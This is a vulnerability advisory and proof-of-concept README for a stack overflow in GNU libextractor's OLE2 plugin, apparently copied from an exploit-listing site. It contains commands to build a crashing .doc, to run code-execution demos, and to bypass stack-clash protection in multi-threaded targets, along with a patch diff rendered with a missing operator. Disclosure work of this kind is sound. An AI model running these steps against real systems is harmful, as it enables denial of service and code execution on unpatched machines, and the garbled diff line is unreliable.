## https://sploitus.com/exploit?id=0235A98C-2CDE-5F3B-8090-524B0CE466C9
# Stack-Based Buffer Overflow in GNU libextractor ≤ 1.14 (OLE2 Plugin)
## Summary
A stack-based buffer overflow in GNU libextractor's OLE2 plugin allows **remote denial of service** (crash) and **code execution** when a crafted `.doc` file is processed. The bug is in `process_star_office()` (`ole2_extractor.c:349`), which allocates a variable-length array (VLA) of up to 4 MB on the stack, sized from attacker-controlled file data.
**Primary Impact:** Remote Denial of Service: crashes any application that processes the malicious file
**Secondary Impact:** Remote Code Execution via an adjacent-thread-stack bypass of `-fstack-clash-protection`
| Field | Value |
|-------|-------|
| Severity | **HIGH** (DoS) / **CRITICAL** (RCE in multi-threaded in-process mode) |
| CWE | CWE-121 (Stack-based Buffer Overflow) |
| Attack Vector | Network (any file processing path) |
| Privileges Required | None |
| User Interaction | None |
| Affected Versions | All versions through 1.14 |
> **Note:** GCC 8 introduced `-fstack-clash-protection`, and most distribution toolchains (Fedora and Ubuntu, for example) enable it by default. In a single-threaded process it turns this overflow into a plain crash: the compiler probes each page of the VLA, so the allocation reaches the guard page below the stack and faults before any data is written. **This mitigation can be bypassed in multi-threaded applications** where thread stacks sit next to each other in memory: the probes land in the neighbouring thread's stack instead of a guard page, and the overflow becomes controllable again even on hardened builds. Before assuming a target is affected, inspect its thread-stack layout (for example in `/proc/<pid>/maps`) to see what separates adjacent stacks. See [docs/BYPASS.md](docs/BYPASS.md) for details.
## Affected Software
- GNU libextractor ≤ 1.14 (all versions with the OLE2 plugin)
- Any application using libextractor to process untrusted `.doc` files
- GNUnet (file sharing indexer)
## Quick Demo
```bash
# Generate malicious .doc
python3 poc/gen_payload.py exploit.doc
# Any application that processes this file with libextractor crashes:
extract exploit.doc          # CLI tool: the OLE2 plugin worker crashes
gnunet-publish exploit.doc   # GNUnet: gnunet-helper-fs-publish crashes
```
## Proof of Concept (Lab Demo)
*The demo recording shipped with the repository shows the automated lab environment in the `lab-setup/` directory. Running `docker compose up` starts an attacker container that generates the malicious `.doc` payload and uploads it to a vulnerable document-indexing web service. The `libextractor` parsing logic triggers the VLA stack overflow, and the attacker silently achieves arbitrary code execution. The exploit is verified by running `cat /tmp/pwned` on the target container and reading the command output.*
## Repository Structure
```
├── poc/                      # Proof of concept
│   ├── gen_payload.py        # Generates malicious .doc trigger file
│   ├── poc_rce.c             # Demonstrates code execution (protection disabled)
│   └── bypass_rce.c          # Stack-clash-protection bypass (multi-threaded)
├── exploit/                  # Exploitation details
│   ├── remote_exploit.sh     # Example: triggering via HTTP upload (lab scenario)
│   └── extract_server.c      # Example: vulnerable application using libextractor
├── patches/                  # Recommended fix
│   └── 0001-fix-ole2-vla.patch
├── lab-setup/                # Reproducible test environment
│   ├── Dockerfile            # Builds vulnerable libextractor from source
│   ├── docker-compose.yml    # Full lab (includes HTTP upload as one test vector)
│   └── upload_server.py      # Document indexing service simulation
└── docs/
    ├── BYPASS.md             # Stack-clash-protection bypass technique
    └── PAYLOAD_STRUCTURE.md  # Malicious .doc file format documentation
```
## Reproduction
### Crash / DoS (works on any system)
```bash
# Build libextractor from source
./configure && make && sudo make install
# Generate trigger file
python3 poc/gen_payload.py exploit.doc
# Crash any libextractor consumer
extract exploit.doc   # crashes the OLE2 plugin worker
```
### Code Execution (protection disabled)
```bash
gcc -O2 -fno-stack-clash-protection -o poc_rce poc/poc_rce.c -lextractor
ulimit -s 2048        # 2 MiB stack: the 4 MiB VLA now runs past the guard page
./poc_rce exploit.doc # executes attacker payload (exit code 42)
```
### Code Execution (protection bypass, multi-threaded)
```bash
gcc -O2 -fstack-clash-protection -o bypass_rce poc/bypass_rce.c -lextractor -lpthread
./bypass_rce exploit.doc # bypasses protection, executes payload (exit code 42)
```
### Docker lab
```bash
docker-compose -f lab-setup/docker-compose.yml up -d
```
## Root Cause
```c
// src/plugins/ole2_extractor.c:349
off_t size = gsf_input_size(src);        // attacker controls this via the OLE2 stream size
if (size > 4 * 1024 * 1024) return 0;    // caps at 4 MB, but the stack itself is only 1-8 MB
char buf[size];                          // VLA: up to 4 MB ON THE STACK, below the current frame
gsf_input_read(src, size, buf);          // attacker data written into that region
```
Without `-fstack-clash-protection`, the compiler reserves the whole VLA with a single subtraction:
```asm
sub %rax, %rsp ; one instruction moves RSP past the guard page in a single step
```
No page between the old and new stack pointer is touched, so a 4 MB VLA on a 2 MB stack silently lands RSP in whatever mapping lies below the guard page, and the following `gsf_input_read()` writes attacker data there. With `-fstack-clash-protection`, the compiler probes each page as it allocates, which normally faults on the guard page; in multi-threaded contexts those probes can still be bypassed (see [docs/BYPASS.md](docs/BYPASS.md)).
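As an added example, not code from this repository or from libextractor, the root-cause pattern above and the `ulimit -s 2048` reproduction step modelled on an in-memory stream, so the VLA variant and the fixed-buffer variant from the 1.15 patch can be compared without libgsf. `struct stream`, `stream_read()`, `process_vla()`, `process_fixed()`, `vla_fits()` and the 8 KiB sample data are hypothetical stand-ins for `GsfInput`, `gsf_input_read()` and a real OLE2 stream:

```c
/* Added example (not libextractor's code): the process_star_office() pattern
 * on an in-memory stream.  All names below are hypothetical stand-ins. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

#define MAX_STREAM (4u * 1024 * 1024)   /* the original 4 MiB cap */
#define HEADER_LEN 0x374                /* sizeof(buf) in the 1.15 patch */

/* Stand-in for GsfInput: backing bytes plus the size the container declares
 * for the stream (attacker-controlled in a crafted .doc). */
struct stream {
    const unsigned char *data;
    size_t size;
};

/* Stand-in for gsf_input_read(): fails (like its NULL return) on a short read. */
static int stream_read(const struct stream *s, size_t n, unsigned char *out)
{
    if (n > s->size)
        return -1;
    memcpy(out, s->data, n);
    return 0;
}

/* Vulnerable pattern: stack buffer sized by the stream, capped only at 4 MiB.
 * Returns the first byte "parsed", or -1 when the cap rejects the stream.
 * A multi-megabyte stream under a small `ulimit -s` faults in the VLA itself. */
static int process_vla(const struct stream *s)
{
    if (s->size > MAX_STREAM)
        return -1;
    unsigned char buf[s->size];         /* VLA: up to 4 MiB on the stack */
    if (stream_read(s, s->size, buf) != 0)
        return -1;
    return buf[0];
}

/* Hardened pattern from the patch: fixed-size buffer, short streams rejected,
 * never more than sizeof buf read.  Returns bytes consumed, or -1. */
static int process_fixed(const struct stream *s)
{
    unsigned char buf[HEADER_LEN];
    if (s->size < sizeof buf)
        return -1;
    if (stream_read(s, sizeof buf, buf) != 0)
        return -1;
    return (int)sizeof buf;             /* 0x374 */
}

/* The check the 4 MiB cap skipped: does a VLA of `want` bytes fit under the
 * stack limit while leaving `headroom` for frames already on the stack?
 * With `ulimit -s 2048` (2 MiB) a 4 MiB VLA never fits. */
static int vla_fits(size_t want, rlim_t stack_limit, size_t headroom)
{
    if (stack_limit == RLIM_INFINITY)
        return 1;
    return want + headroom <= stack_limit;
}

static int vla_fits_here(size_t want)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_STACK, &rl) != 0)
        return 0;
    return vla_fits(want, rl.rlim_cur, 256u * 1024);
}

/* Constructed sample: 8 KiB counting pattern standing in for an OLE2 stream.
 * Sizes passed below either fit inside it or are rejected before any read. */
static unsigned char sample[8192];

static struct stream sample_stream(size_t declared)
{
    for (size_t i = 0; i < sizeof sample; i++)
        sample[i] = (unsigned char)(i & 0xff);
    return (struct stream){ sample, declared };
}

static int run_vla(size_t declared)
{
    struct stream s = sample_stream(declared);
    return process_vla(&s);
}

static int run_fixed(size_t declared)
{
    struct stream s = sample_stream(declared);
    return process_fixed(&s);
}

int main(void)
{
    printf("vla   8 KiB -> %d\n", run_vla(8192));               /* 0: parsed */
    printf("vla   5 MiB -> %d\n", run_vla(5u * 1024 * 1024));   /* -1: over cap */
    printf("fixed 8 KiB -> %d\n", run_fixed(8192));             /* 884 bytes */
    printf("fixed 100 B -> %d\n", run_fixed(100));              /* -1: too short */
    printf("4 MiB VLA fits under this shell's ulimit -s: %s\n",
           vla_fits_here(MAX_STREAM) ? "yes" : "no");
    return 0;
}
```

Run it once normally and once after `ulimit -s 2048`: the last line flips to "no", which is exactly the condition under which the real plugin's 4 MiB cap stops protecting anything. `process_fixed()` never consults the declared size except to reject streams too short to hold the header, so the attacker loses control over how much stack is consumed.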
## Official Patch (libextractor 1.15)
```diff
- if ( (size 4 * 1024 * 1024) )
+ char buf[0x374];
+
+ if (size < 0x374)
return 0;
- {
- char buf[size];
- gsf_input_read (src, size, (unsigned char*) buf);
+ gsf_input_read (src, sizeof(buf), (unsigned char*) buf);
```
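Review bot: the removed condition on the first line of the hunk has lost its comparison operator in this rendering (it reads `if ( (size 4 * 1024 * 1024) )`), so take the `>` from the actual patch file rather than this page if applying it by hand. The new guard `if (size < 0x374) return 0;` inverts the sense of the old one: streams shorter than 0x374 bytes are now rejected and anything longer is truncated to `sizeof(buf)`, which is only correct if the parsing that follows uses no more than those first 0x374 bytes; give that size a named constant so the dependence is documented. The return value of `gsf_input_read` is still not checked in the visible lines; on a short read libgsf returns NULL and `buf` is left uninitialised, so add `if (NULL == gsf_input_read (src, sizeof(buf), (unsigned char*) buf)) return 0;`.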
## Credit
Discovered by me (Haitam Lazaar) during my independent security research.
## License
My research is provided for educational and defensive purposes. Use responsibly.